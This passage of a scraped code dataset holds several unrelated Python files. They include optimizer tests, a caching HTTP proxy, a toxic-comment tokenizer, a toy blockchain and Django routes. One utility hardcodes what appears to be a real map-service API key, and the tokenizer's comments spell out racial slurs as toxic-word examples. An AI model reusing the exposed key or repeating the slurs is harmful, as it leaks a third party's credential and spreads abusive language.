0.5\n\n assert new_ba.r == 0.5\n\n\ndef test_ba_hyperparams_setter():\n new_ba = ba.BA()\n\n try:\n new_ba.f_min = 'a'\n except:\n new_ba.f_min = 0.1\n\n try:\n new_ba.f_min = -1\n except:\n new_ba.f_min = 0.1\n\n assert new_ba.f_min == 0.1\n\n try:\n new_ba.f_max = 'b'\n except:\n new_ba.f_max = 2\n\n try:\n new_ba.f_max = -1\n except:\n new_ba.f_max = 2\n\n try:\n new_ba.f_max = 0\n except:\n new_ba.f_max = 2\n\n assert new_ba.f_max == 2\n\n try:\n new_ba.A = 'c'\n except:\n new_ba.A = 0.5\n\n try:\n new_ba.A = -1\n except:\n new_ba.A = 0.5\n\n assert new_ba.A == 0.5\n\n try:\n new_ba.r = 'd'\n except:\n new_ba.r = 0.5\n\n try:\n new_ba.r = -1\n except:\n new_ba.r = 0.5\n\n assert new_ba.r == 0.5\n\n\ndef test_ba_build():\n new_ba = ba.BA()\n\n assert new_ba.built == True\n\n\ndef test_ba_update_frequency():\n new_ba = ba.BA()\n\n frequency = new_ba._update_frequency(0, 2)\n\n assert frequency != 0\n\n\ndef test_ba_update_velocity():\n new_ba = ba.BA()\n\n velocity = new_ba._update_velocity(1, 1, 1, 1)\n\n assert velocity != 0\n\n\ndef test_ba_update_position():\n new_ba = ba.BA()\n\n position = new_ba._update_position(1, 1)\n\n assert position == 2\n\n\ndef test_ba_run():\n def square(x):\n return np.sum(x**2)\n\n def hook(optimizer, space, function):\n return\n\n new_function = function.Function(pointer=square)\n\n hyperparams = {\n 'f_min': 0,\n 'f_max': 2,\n 'A': 1,\n 'r': 0.5\n }\n\n new_ba = ba.BA(hyperparams=hyperparams)\n\n search_space = search.SearchSpace(n_agents=10, n_iterations=100,\n n_variables=2, lower_bound=[0, 0],\n upper_bound=[10, 10])\n\n history = new_ba.run(search_space, new_function, pre_evaluation_hook=hook)\n\n assert len(history.agents) > 0\n assert len(history.best_agent) > 0\n\n best_fitness = history.best_agent[-1][1]\n assert best_fitness <= constants.TEST_EPSILON, 'The algorithm ba failed to converge.'\n","sub_path":"tests/opytimizer/optimizers/test_ba.py","file_name":"test_ba.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"454470366","text":"n, d = map(int, input().split())\r\nseq = list(map(int, input().split()))\r\n\r\nflag, count, pos = False, 0, -1\r\nwhile pos < n-2:\r\n\tpos += 1\r\n\ttarget1 = seq[pos]+d\r\n\tfor i in range(pos+1, n-1):\r\n\t\tif seq[i] == target1:\r\n\t\t\ttarget2 = seq[i]+d\r\n\t\t\tfor j in range(i+1, n):\r\n\t\t\t\tif seq[j] == target2:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\tflag = True\r\n\t\t\t\tif seq[j] > target2:\r\n\t\t\t\t\tflag = True\r\n\t\t\t\tif flag: \r\n\t\t\t\t\tbreak\r\n\t\tif seq[i] > target1:\r\n\t\t\tflag = True\r\n\t\tif flag: \r\n\t\t\tbreak\r\n\tflag = False\r\nprint(count)\r\n","sub_path":"contests/HackerRank/HackerRank World Codesprint April/problemB.py","file_name":"problemB.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324205218","text":"# author: HuYong\n# coding=utf-8\nimport json\nfrom math import *\nimport requests\n\n\ndef calcDistance(Lat_A, Lng_A, Lat_B, Lng_B):\n ra = 6378.140 # 赤道半径 (km)\n rb = 6356.755 # 极半径 (km)\n flatten = (ra - rb) / ra # 地球扁率\n rad_lat_A = radians(Lat_A)\n rad_lng_A = radians(Lng_A)\n rad_lat_B = radians(Lat_B)\n rad_lng_B = radians(Lng_B)\n pA = atan(rb / ra * tan(rad_lat_A))\n pB = atan(rb / ra * tan(rad_lat_B))\n xx = acos(sin(pA) * sin(pB) + cos(pA) * cos(pB) * cos(rad_lng_A - rad_lng_B))\n c1 = (sin(xx) - xx) * (sin(pA) + sin(pB)) ** 2 / cos(xx / 2) ** 2\n c2 = (sin(xx) + xx) * (sin(pA) - sin(pB)) ** 2 / sin(xx / 2) ** 2\n dr = flatten / 8 * (c1 - c2)\n distance = ra * (xx + dr)\n return float('%.4f' % distance) * 1000\n\n\ndef GetAddress(longitude, latitude):\n BaseUrl = \"http://restapi.amap.com/v3/geocode/regeo?output=json&location=LON,LAT&key=KEY&radius=100&extensions=all&roadlevel=0&poitype=楼\"\n URL = BaseUrl.replace(\"LON\", str(longitude)).replace(\"LAT\", str(latitude)).replace(\"KEY\",\"9c9aaf8f45b7d23a26274866b578a2a9\")\n response = requests.get(URL)\n s = json.loads(response.text)\n return s[\"regeocode\"][\"formatted_address\"]\n\n#print GetAddress(118.721893,32.141903)\n","sub_path":"wechat/WeChatUtil.py","file_name":"WeChatUtil.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"198101381","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# ==============================================================================\n# \\file normalize.py\n# \\author chenghuige \n# \\date 2018-02-13 19:51:49.324339\n# \\Description \n# ==============================================================================\n\n \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nimport sys, os\n\nfrom collections import namedtuple\nimport gezi\n\nimport re\n\ntry:\n import toxic_words\nexcept Exception:\n import prepare.toxic_words\n\n# TODO...\ntry:\n from preprocess import *\nexcept Exception:\n from prepare.preprocess import *\n\nip_pattern = r\"(\\d+\\.\\d+\\.\\d+\\.\\d+)\"\nhttp_pattern = r\"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]\"\n\n# !NOTICE can not set file name to tokenize, will confict with python3 some tokenize.py \nvocab = None\n\n# this vocab is original calculated word freq vocab just using like spacy without any further split or other operations\ntrain_vocab = None \n\ntrain_vocab_path = '/home/gezi/data/kaggle/toxic/ori_vocab.txt'\nMIN_COUNT = 20\n\nSimpleTokens = namedtuple('SimpleTokens', ['tokens', 'ori_tokens', 'attributes'])\nTokens = namedtuple('Tokens', ['tokens', \n 'attributes',\n 'ori_tokens',\n 'poses', \n 'tags',\n 'ners',\n ])\n\ndef init(vocab_path='/home/gezi/data/glove/glove-vocab.txt'):\n global vocab, train_vocab\n if vocab:\n return vocab, train_vocab\n vocab = set() \n for line in open(vocab_path, encoding='utf-8', errors='ignore'):\n vocab.add(line.rstrip('\\n').split('\\t')[0])\n\n # train_vocab = {}\n # for line in open(train_vocab_path):\n # word, count = line.rstrip('\\n').split('\\t')\n # train_vocab[word] = int(count)\n\n return vocab, train_vocab\n\n# def train_dict_has(word):\n# for w in (word, word.lower(), word.capitalize(), word.upper()):\n# if w in train_vocab and train_vocab[w] > MIN_COUNT:\n# return True\n# return False\n\ndef dict_has(word):\n for w in (word, word.lower(), word.capitalize(), word.upper()):\n if w in vocab:\n return True\n return False \n\ndef has(word):\n if not word.strip():\n return False\n #return train_dict_has(word) and dict_has(word)\n return dict_has(word)\n\n\n# problem here is will also remove some other language word like '你' TODO\ndef en_filter(token):\n en_results = []\n results = []\n ens = []\n non_ens = []\n for x in token:\n #if x >= 'a' and x <= 'z' or x >= 'A' and x <= 'Z' or x >= '0' and x <= '9':\n if x >= 'a' and x <= 'z' or x >= 'A' and x <= 'Z':\n if non_ens:\n results.append(''.join(non_ens))\n non_ens = []\n ens.append(x)\n else:\n if ens:\n results.append(''.join(ens))\n en_results.append(results[-1])\n ens = []\n non_ens.append(x)\n if ens:\n results.append(''.join(ens))\n en_results.append(results[-1])\n if non_ens:\n results.append(''.join(non_ens))\n \n return results, en_results\n\n# def can_split(w1, w2):\n# if train_dict_has(w1):\n# if train_dict_has(w2) or dict_has(w2):\n# return True \n# else:\n# return False\n# else:\n# if dict_has(w1) and train_dict_has(w2):\n# return True \n# else:\n# return False\ndef can_split(w1, w2):\n return dict_has(w1) and dict_has(w2) or is_toxic(w1) or is_toxic(w2)\n \ndef try_split(token):\n if len(token) < 6 or has(token):\n return [token]\n \n start = 3\n end = len(token) - 2\n idx = int(len(token) / 2)\n\n for i in range(idx, end):\n w1 = token[:i]\n w2 = token[i:]\n #print('w1:', w1, 'w2:', w2, can_split(w1, w2), train_dict_has(w1), dict_has(w1), train_dict_has(w2), dict_has(w2))\n if can_split(w1, w2):\n return [w1, '', w2]\n\n for i in reversed(range(start, idx)):\n w1 = token[:i]\n w2 = token[i:]\n #print('w1:', w1, 'w2:', w2, can_split(w1, w2), train_dict_has(w1), dict_has(w1), train_dict_has(w2), dict_has(w2))\n if can_split(w1, w2):\n return [w1, '', w2]\n \n return [token]\n\nattribute_names = ['len', 'deform', 'lower', 'upper', 'has_star', 'has_dot', 'has_bracket', 'not_en']\nattribute_default_values = [0.] * len(attribute_names)\nAttributes = namedtuple('Attributes', attribute_names)\n\nassert(len(attribute_names) == len(attribute_default_values))\n\nspecial_tokens = set(['', '', ''])\n\n# toxic_words = set([\n# 'fuck', 'fucking', 'fuckin', \n# 'cunt', 'cunts',\n# 'dick', 'penis', 'bitch', 'nigger', 'die', 'kill'])\n\ndef is_toxic(word):\n for w in (word, word.lower(), word.capitalize(), word.upper()):\n if w in toxic_words.get_toxic_words():\n return True\n return False\n\n# def maybe_toxic(word):\n# for w in toxic_words:\n# if w in word:\n# return True\n# return False\n\ndef get_token_len(token):\n if token in special_tokens:\n return 1\n return len(token)\n\n\ndef is_en(token):\n for x in token:\n if x >= 'a' and x <= 'z' or x >= 'A' and x <= 'Z' or x >= '0' and x <= '9':\n return True \n return False\n\ndef get_attr(token, \n deform=False,\n has_star=False, \n has_dot=False,\n has_bracket=False,\n not_en=False):\n return [get_token_len(token), \n deform,\n token not in special_tokens and token.islower(), \\\n token not in special_tokens and token.isupper(), \\\n has_star, has_dot, has_bracket, not is_en(token)]\n\n\ndef tokenize(text):\n init()\n text = normalize(text)\n\n tokens = gezi.segment.tokenize_filter_empty(text)\n results = []\n attributes = []\n ori_tokens = []\n\n def append(token, ori_token, attr=None):\n results.append(token)\n ori_tokens.append(ori_token)\n attributes.append(attr or get_attr(token))\n\n for token in tokens:\n ori_token = token\n\n #print('results', results)\n if token in tokens_map:\n token = tokens_map[token]\n append(token, ori_token)\n else:\n if FLAGS.is_twitter:\n token = token.lower()\n else:\n if re.match(ip_pattern, token):\n token = ''\n\n # NOTICE! if http hurt perf, remove!\n if re.match(http_pattern, token):\n token = ''\n\n if has(token):\n append(token, ori_token)\n else:\n tokens, en_tokens = en_filter(token)\n tokens = [x for x in tokens if x.strip()]\n en_token = ''.join(en_tokens)\n #print('----...', tokens, en_token, en_tokens)\n # Nig(g)er -> Nigger but lose some info might just 'Nig', '', 'g', '', 'er' ? or mark as deformed word! TODO add to word vector\n if has(en_token):\n has_star = '*' in token\n has_dot = '.' in token\n has_bracket = '(' in token or ')' in token or '[' in token or ']' in token or '(' in token or ')' in token\n is_deform = is_toxic(en_token)\n\n if is_deform:\n print(en_token, token, ori_token)\n \n attr = [len(token), \n is_deform, en_token.islower(), en_token.isupper(), \n has_star, has_dot, has_bracket, False]\n if is_deform:\n append(en_token, ori_token, attr)\n else:\n append(token, ori_token, attr)\n else:\n token_results = try_split(en_token)\n if len(token_results) == 1:\n token_results = []\n for token in en_tokens:\n #print('----', token)\n token_results += try_split(token)\n token_results += ['']\n if token_results:\n del token_results[-1]\n for token in token_results:\n append(token, ori_token, get_attr(token, True))\n else:\n append(token, ori_token)\n else:\n for token in token_results:\n append(token, ori_token, get_attr(token, True))\n\n if not results:\n token = 'ok'\n append(token, token)\n\n assert len(results) == len(attributes)\n return SimpleTokens(*([results, ori_tokens, attributes]))\n\n# TODO merge code\n\n \ndef full_tokenize(text):\n init()\n # can cause http.. as PERSON\n text = normalize(text)\n doc = gezi.doc(text)\n results = []\n attributes = []\n poses = []\n tags = []\n ners = []\n ori_tokens = []\n\n def append(token, ori_token, ner='NONE', attr=None):\n results.append(token)\n poses.append(ori_token.pos_)\n tags.append(ori_token.tag_)\n attributes.append(attr or get_attr(token))\n ners.append(ner)\n ori_tokens.append(ori_token.text.replace(' ', '').replace('NEWLINE', '\\x01'))\n \n ner_idx = 0\n ner_list = [(x.text, x.label_) for x in doc.ents]\n \n ner_ok = True \n for x, y in ner_list:\n if 'NEWLINE' in x:\n ner_ok = False \n break \n \n #print('-----ner list', ner_list, ner_ok)\n if not ner_ok:\n ner_list = []\n\n for token_ in doc:\n token = token_.text\n \n # NOTICE! filtered empty text, if not filter later you must not split by ' ', here already remove will ok\n if not token.strip():\n continue\n\n if FLAGS.is_twitter:\n token = token.lower()\n else:\n if re.match(ip_pattern, token):\n token = ''\n\n # NOTICE! if http hurt perf, remove!\n if re.match(http_pattern, token):\n token = ''\n\n # TODO better..\n ner = 'NONE'\n for i in range(ner_idx, len(ner_list)):\n if token == ner_list[i][0] or (len(token) > 2 and token in ner_list[i][0]):\n ner = ner_list[i][1]\n ner_idx = i + 1\n break\n #if ner != 'None':\n # print(token, ner)\n\n if token in tokens_map:\n token = tokens_map[token]\n append(token, token_, ner)\n else:\n if FLAGS.is_twitter:\n token = token.lower()\n else:\n if re.match(ip_pattern, token):\n token = ''\n\n # NOTICE! if http hurt perf, remove!\n if re.match(http_pattern, token):\n token = ''\n\n #if has(token) or (ner != 'NONE' and not maybe_toxic(token)):\n if has(token):\n #if has(token) or ner == 'PERSON':\n append(token, token_, ner)\n else:\n #print('token', token)\n tokens, en_tokens = en_filter(token)\n tokens = [x for x in tokens if x.strip()]\n en_token = ''.join(en_tokens)\n #print('!!!', tokens, en_tokens, en_token)\n # Nig(g)er -> Nigger but lose some info might just 'Nig', '', 'g', '', 'er' ? or mark as deformed word! TODO add to word vector\n #if has(en_token) or (ner != 'NONE' and not maybe_toxic(token)):\n if has(en_token):\n #if has(en_token) or ner == 'PERSON':\n has_star = '*' in token\n has_dot = '.' in token\n has_bracket = '(' in token or ')' in token or '[' in token or ']' in token or '(' in token or ')' in token\n is_deform = is_toxic(en_token)\n attr = [len(token), is_deform,\n en_token.islower(), en_token.isupper(), \n has_star, has_dot, has_bracket, False]\n if is_deform:\n append(en_token, token_, ner, attr)\n else:\n append(token, token_, ner, attr)\n else:\n token_results = try_split(en_token)\n if len(token_results) == 1:\n token_results = []\n for token in en_tokens:\n #print('----', token)\n token_results += try_split(token)\n token_results += ['']\n if token_results:\n del token_results[-1]\n for token in token_results:\n append(token, token_, ner, get_attr(token, True))\n else:\n append(token, token_, ner)\n else:\n for token in token_results:\n append(token, token_, ner, get_attr(token, True))\n\n if not results:\n return full_tokenize('ok')\n assert len(results) == len(attributes) == len(ori_tokens) == len(poses) == len(tags) == len(ners)\n return Tokens(*([results, attributes, ori_tokens, poses, tags, ners]))\n","sub_path":"projects/ai/kaggle/toxic/prepare/tokenizer-v3.py","file_name":"tokenizer-v3.py","file_ext":"py","file_size_in_byte":12070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"169061850","text":"import codecs\nfrom genericpath import exists\nimport os\nimport socket\nimport sys\nimport threading\nimport datetime\n\nip = 'localhost'\nport = 8888\ndata = datetime.datetime.now()\n\n#Pegando o tempo em cache\ntimeInCache = sys.argv[1]\n#-----------------------\n\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((ip, port))\nserver.listen(5)\nprint(f\"Escutando: {ip} \\nporta: {port}\")\nserver_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndef conexao_em_espera(conexao, addr):\n print('Nova Conexão: ', addr)\n\n\ndef post_it(salvar_cache):\n no_cache = '\\n

    Novo: {}

    '.format(data)\n if salvar_cache.find(b'html'):\n respostaEmString = salvar_cache.decode()\n indiceDoBody = respostaEmString.find(\"\")\n novaRespostaEmString = respostaEmString[:indiceDoBody + 6] + no_cache + respostaEmString[indiceDoBody + 6:]\n print(novaRespostaEmString)\n if novaRespostaEmString.find(\"Cache-Control: max-age=604800\"):\n novaRespostaEmString = novaRespostaEmString.replace(\"Cache-Control: max-age=604800\",\"Cache-Control: max-age=120\")\n print(novaRespostaEmString)\n return novaRespostaEmString\n else:\n return salvar_cache\n \n\ndef salvar_em_cache(carregamento_pag, conexao, str_dominio,imag_str):\n salvar_cache = codecs.decode(carregamento_pag, encoding= 'base64')\n salvar_cacheSTR = str(salvar_cache)\n arquivo = open(str_dominio+imag_str+'.txt','w')\n arquivo.write(salvar_cacheSTR)\n #arquivo.close()\n #amarelonatela = \n #post_it(salvar_cache,conexao)\n #return amarelonatela\n\ndef ler_cache(str_dominio,imag_str):\n ler_arquivo = open(str_dominio+imag_str,'r')\n return ler_arquivo\n\ndef conexao_browser(str_dominio, url_Complexa_Divisao, urlTratamento, conexao, addr,imag_str):\n \n teste_tamanho_url = (len(url_Complexa_Divisao))\n #www.example.org\n if teste_tamanho_url != 0:\n for count in range (len(url_Complexa_Divisao)-1):\n concatenar_url_complex = url_Complexa_Divisao[count]+'/'+url_Complexa_Divisao[count+1]\n concatenar_url_complexSTR = str(concatenar_url_complex)\n complemento_url = concatenar_url_complexSTR.split(\"'\")[0]\n conexao_url = ('GET /'+complemento_url+' HTTP/1.1\\r\\nHost: '+str_dominio+'\\r\\n\\r\\n')\n else:\n conexao_url = ('GET / HTTP/1.1\\r\\nHost: '+str_dominio+'\\r\\n\\r\\n')\n \n server_client.sendall(conexao_url.encode())\n carregamento_pag = server_client.recv(350000)\n carregamento_pag_com_post_it = post_it(carregamento_pag)\n conexao.sendall(carregamento_pag_com_post_it.encode())\n print(\"Valor Informado: \", urlTratamento)\n thread = threading.Thread(target=conexao_em_espera, args=(conexao,addr))\n thread.start()\n print(f\"Conexão Recebida: \", {threading.active_count() - 1})\n salvar_em_cache(carregamento_pag,conexao, str_dominio,imag_str)\n\n\ndef main():\n while True:\n #tratamento do corpo da URL\n conexao, addr = server.accept()\n requisicao = conexao.recv(350000) \n urlTratamento = requisicao.split()[1]\n urlTratamento_STR = str(urlTratamento)\n urlTratamento_ASPAS = urlTratamento_STR.split(\"'\")[1]\n urlTratamento_ASPAS_STR = str(urlTratamento_ASPAS)\n selec_imagem = urlTratamento_ASPAS_STR.split(\".\")\n imag_str = str(selec_imagem [-1])\n urlTratamento_BARRA = urlTratamento_ASPAS_STR.split('/')[1]\n urlTratamento_BARRA_STR = str(urlTratamento_BARRA)\n url_Complexa = urlTratamento_STR.split('/')\n url_Complexa_Divisao = url_Complexa[2:]\n str_dominio = urlTratamento_BARRA_STR.strip('')\n \n # Tratamento Favicon e Imagem\n if(str_dominio == 'favicon.ico'):\n continue\n else:\n try:\n server_client.connect((str_dominio,80))\n except:\n pass\n\n if os.path.exists(str_dominio+imag_str):\n if str_dominio+imag_str == '_io.TextIOWrapper':\n continue\n else:\n carregamento_do_browser= ler_cache(str_dominio,imag_str)\n conexao.sendall(carregamento_do_browser) \n else: \n conexao_browser(str_dominio, url_Complexa_Divisao, urlTratamento, conexao, addr, imag_str)\n\nif __name__ == \"__main__\":\n main()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199450360","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\nimport mysql.connector\r\nclass stokTedarik(QDialog):\r\n def __init__(self,parent=None):\r\n super(stokTedarik,self).__init__(parent)\r\n grid=QGridLayout()\r\n\r\n \r\n grid.addWidget(QLabel(\"Çikolata\"),0,0)\r\n grid.addWidget(QLabel(\"Peynir\"),1,0)\r\n grid.addWidget(QLabel(\"Tavuk\"),2,0)\r\n grid.addWidget(QLabel(\"Ekmek\"),3,0)\r\n grid.addWidget(QLabel(\"Süt\"),4,0)\r\n\r\n self.gofretSat=QLineEdit()\r\n self.peynirSat=QLineEdit()\r\n self.tavukSat=QLineEdit()\r\n self.ekmekSat=QLineEdit()\r\n self.sutSat=QLineEdit()\r\n\r\n self.gofretSip=QLineEdit()\r\n self.peynirSip=QLineEdit()\r\n self.tavukSip=QLineEdit()\r\n self.ekmekSip=QLineEdit()\r\n self.sutSip=QLineEdit()\r\n\r\n self.gofretAdet=QLabel()\r\n self.peynirAdet=QLabel()\r\n self.tavukAdet=QLabel()\r\n self.ekmekAdet=QLabel()\r\n self.sutAdet=QLabel()\r\n \r\n self.satisButon=QPushButton(\"SAT\") \r\n self.siparisButon=QPushButton(\"SİPARİŞ\")\r\n \r\n \r\n #ekrana ekleme\r\n \r\n grid.addWidget(self.gofretSat,0,1)\r\n grid.addWidget(self.peynirSat,1,1)\r\n grid.addWidget(self.tavukSat,2,1)\r\n grid.addWidget(self.ekmekSat,3,1)\r\n grid.addWidget(self.sutSat,4,1)\r\n \r\n grid.addWidget(self.gofretSip,0,2)\r\n grid.addWidget(self.peynirSip,1,2)\r\n grid.addWidget(self.tavukSip,2,2)\r\n grid.addWidget(self.ekmekSip,3,2)\r\n grid.addWidget(self.sutSip,4,2)\r\n\r\n grid.addWidget(self.gofretAdet,0,3)\r\n grid.addWidget(self.peynirAdet,1,3)\r\n grid.addWidget(self.tavukAdet,2,3)\r\n grid.addWidget(self.ekmekAdet,3,3)\r\n grid.addWidget(self.sutAdet,4,3)\r\n\r\n grid.addWidget(self.satisButon,5,1) \r\n grid.addWidget(self.siparisButon,5,2) \r\n\r\n self.setLayout(grid)\r\n\r\n def sat(self):\r\n gofret=self.gofretAdet.text()\r\n baglanti=mysql.connector.connect(user=\"root\",password=\"\",host=\"127.0.0.1\",database=\"bimbucasube\")\r\n isaretci=baglanti.cursor()\r\n isaretci.execute('''SELECT * FROM stokyonetimi '''%stok_miktar)\r\n row=isaretci.fetchall()#[[25]]\r\n for r in row:#[25]\r\n res=int(''.join(map(str,r)))#25\r\n res=res-1#24\r\n isaretci.execute('''SELECT * FROM stokyonetimi ''')\r\n gelenler=isaretci.fetchall()#[[can,111,515,515]]\r\n for row in gelenler:#[can,111,515,515]\r\n self.gofretAdet.setText(row[1])#can\r\n self.peynirAdet.setText(row[2])\r\n self.tavukAdet.setText(row[3])\r\n self.ekmekAdet.setText(row[4])\r\n self.sutAdet.setText(row[5])\r\n \r\n baglanti.close()\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nuyg=QApplication([])\r\npencere=stokTedarik()\r\npencere.show()\r\nuyg.exec_()\r\n","sub_path":"odev emre.py","file_name":"odev emre.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215167508","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns =[ \n path('',views.index, name='index'),\n path('userExercises', views.exerciseList, name='exercises'),\n path('exercise', views.apiExercise, name='apiExercise'),\n path('home',views.index, name = 'home'),\n path('session', views.session, name='workoutSession'),\n path('api/set', views.apiSet, name='apiSet'),\n path('api/session',views.apiSession, name='apiSession'),\n path('session_summary/', views.sessionSummary, name='sessionSummary'),\n path('api/individual', views.apiIndiv, name='apiIndiv'),\n path('api/signOut', views.signOut, name='apiSignOut'),\n path('history', views.historySummary, name='historySummary'),\n path('add_exercise', views.addExercise, name='addExercisePage'),\n path('api/exercise', views.apiExercise, name='apiExercise'),\n path('profile', views.profilePage, name='profilePage'),\n path('newProgram', views.planView, name ='planView'),\n path('api/program', views.apiProgram, name='apiProgram'),\n path('api/plannedSets', views.apiPlannedSets, name='apiPlannedSets'),\n path('userPrograms', views.programList, name='programList'),\n path('startProgram', views.startProgram, name='startProgram'),\n]\n","sub_path":"workouts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"636593559","text":"from math import fabs, sqrt, pow\n\n\"\"\"Подсчет длины траектории при линейной траектории.\nВходные данные:\n1. Координаты начальной точки [x, y, z];\n2. координаты конечной точки [x, y, z].\nВыходные данные:\n1. Длина траектории, мм.\"\"\"\ndef LengthLinear(start, end):\n length = sqrt((pow((end[0]-start[0]), 2))+(pow((end[1]-start[1]), 2)))\n return length\n\n\n#Линейная интерполяция\n\"\"\"Расчет движения инструмента по координатам.\nВходные данные:\n1. координаты начальной точки [x, y];\n2. координаты конечной точки [x, y];\n3. список скоростей, мм/с;\n4. скорость на предыдущем блоке, мм/с;\n5. длина блока, мм;\n6. время интерполяции, с.\nВыходные данные:\n1. список координат по оси X, мм;\n2. список координат по оси Y, мм.\"\"\"\ndef InterpolationLinear(p_start, p_finish, vellist, vellast, length, tsam):\n S = 0\n x_list = []\n y_list = []\n x_list.append(p_start[0])\n y_list.append(p_start[1])\n x_tmp = p_start[0]\n y_tmp = p_start[1]\n for i in range (len(vellist)):\n #расчет единичного перемещения\n if i == 0:\n Si = tsam*(vellist[i]+vellast)/2\n else:\n Si = tsam*(vellist[i]+vellist[i-1])/2\n #расчет приращений для каждой координаты\n delta_x = Si*(fabs(p_finish[0]-p_start[0])/length)\n delta_y = Si*(fabs(p_finish[1]-p_start[1])/length)\n x_tmp += delta_x\n y_tmp += delta_y\n x_list.append(x_tmp)\n y_list.append(y_tmp)\n S += Si\n print(\"Длина пути по интерполятору: \" + str(S))\n return x_list, y_list, S\n","sub_path":"Старое новое/Interpolation.py","file_name":"Interpolation.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146985967","text":"# Extracting the last element of the blockchain list\ndef get_last_value():\n return (blockchain[-1])\n\n# Appending the last element along with the current element in a block to the blockchain\ndef add_value(transaction_amount, last_transaction=[1]):\n blockchain.append([last_transaction, transaction_amount])\n\ndef get_transaction_value():\n user_value = float(input(\"Enter your transaction amount: \"))\n\n return user_value\n\ndef get_user_choice():\n\n user_input = input(\"Please give your choice here: \")\n\n return int(user_input)\n\ndef print_block():\n\n for block in blockchain:\n print(\"Here is your block\")\n print(block)\n\n# Returns false if manipulation has been done\ndef verify_chain():\n index = 0\n valid = True\n \n for block in blockchain:\n if index == 0:\n index += 1\n continue\n elif block[0] == blockchain[index-1]:\n valid = True\n else:\n valid = False\n break\n index += 1\n \n return valid\n\nblockchain = []\n\ntx_amount = get_transaction_value()\nadd_value(tx_amount)\n\nwhile True:\n print(\"Choose an option\")\n print(\"Choose 1 for adding a new transaction\")\n print(\"Choose 2 for printing the blockchain\")\n print(\"Choose 3 if you want to manipulate the data\")\n print(\"Choose anything else if you want to quit\")\n\n user_choice = get_user_choice()\n\n if user_choice == 1:\n tx_amount = get_transaction_value()\n add_value(tx_amount, get_last_value())\n\n elif user_choice == 2:\n print_block()\n\n elif user_choice == 3:\n if len(blockchain) >= 1:\n blockchain[0] = 2\n \n else: \n break\n\n if not verify_chain():\n print(\"Blockchain manipulated\")\n break","sub_path":"BCBasics.py","file_name":"BCBasics.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"491221135","text":"\"\"\"\nThis code is modified based on Jin-Hwa Kim's repository (Bilinear Attention Networks - https://github.com/jnhwkim/ban-vqa) by Xuan B. Nguyen\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport json\nimport _pickle as cPickle\nimport numpy as np\nimport utils\nimport torch\nfrom language_model import WordEmbedding\nfrom torch.utils.data import Dataset\nimport itertools\nimport warnings\nwith warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\",category=FutureWarning)\nCOUNTING_ONLY = False\n# Following Trott et al. (ICLR 2018)\n# Interpretable Counting for Visual Question Answering\ndef is_howmany(q, a, label2ans):\n if 'how many' in q.lower() or \\\n ('number of' in q.lower() and 'number of the' not in q.lower()) or \\\n 'amount of' in q.lower() or \\\n 'count of' in q.lower():\n if a is None or answer_filter(a, label2ans):\n return True\n else:\n return False\n else:\n return False\n\ndef answer_filter(answers, label2ans, max_num=10):\n for ans in answers['labels']:\n if label2ans[ans].isdigit() and max_num >= int(label2ans[ans]):\n return True\n return False\n\nclass Dictionary(object):\n def __init__(self, word2idx=None, idx2word=None):\n if word2idx is None:\n word2idx = {}\n if idx2word is None:\n idx2word = []\n self.word2idx = word2idx\n self.idx2word = idx2word\n\n @property\n def ntoken(self):\n return len(self.word2idx)\n\n @property\n def padding_idx(self):\n return len(self.word2idx)\n\n def tokenize(self, sentence, add_word):\n sentence = sentence.lower()\n if \"? -yes/no\" in sentence:\n sentence = sentence.replace(\"? -yes/no\", \"\")\n if \"? -open\" in sentence:\n sentence = sentence.replace(\"? -open\", \"\")\n if \"? - open\" in sentence:\n sentence = sentence.replace(\"? - open\", \"\")\n sentence = sentence.replace(',', '').replace('?', '').replace('\\'s', ' \\'s').replace('...', '').replace('x ray', 'x-ray').replace('.', '')\n words = sentence.split()\n tokens = []\n if add_word:\n for w in words:\n tokens.append(self.add_word(w))\n else:\n for w in words:\n # if a word is not in dictionary, it will be replaced with the last word of dictionary.\n tokens.append(self.word2idx.get(w, self.padding_idx-1))\n return tokens\n\n def dump_to_file(self, path):\n cPickle.dump([self.word2idx, self.idx2word], open(path, 'wb'))\n print('dictionary dumped to %s' % path)\n\n @classmethod\n def load_from_file(cls, path):\n print('loading dictionary from %s' % path)\n word2idx, idx2word = cPickle.load(open(path, 'rb'))\n d = cls(word2idx, idx2word)\n return d\n\n def add_word(self, word):\n if word not in self.word2idx:\n self.idx2word.append(word)\n self.word2idx[word] = len(self.idx2word) - 1\n return self.word2idx[word]\n\n def __len__(self):\n return 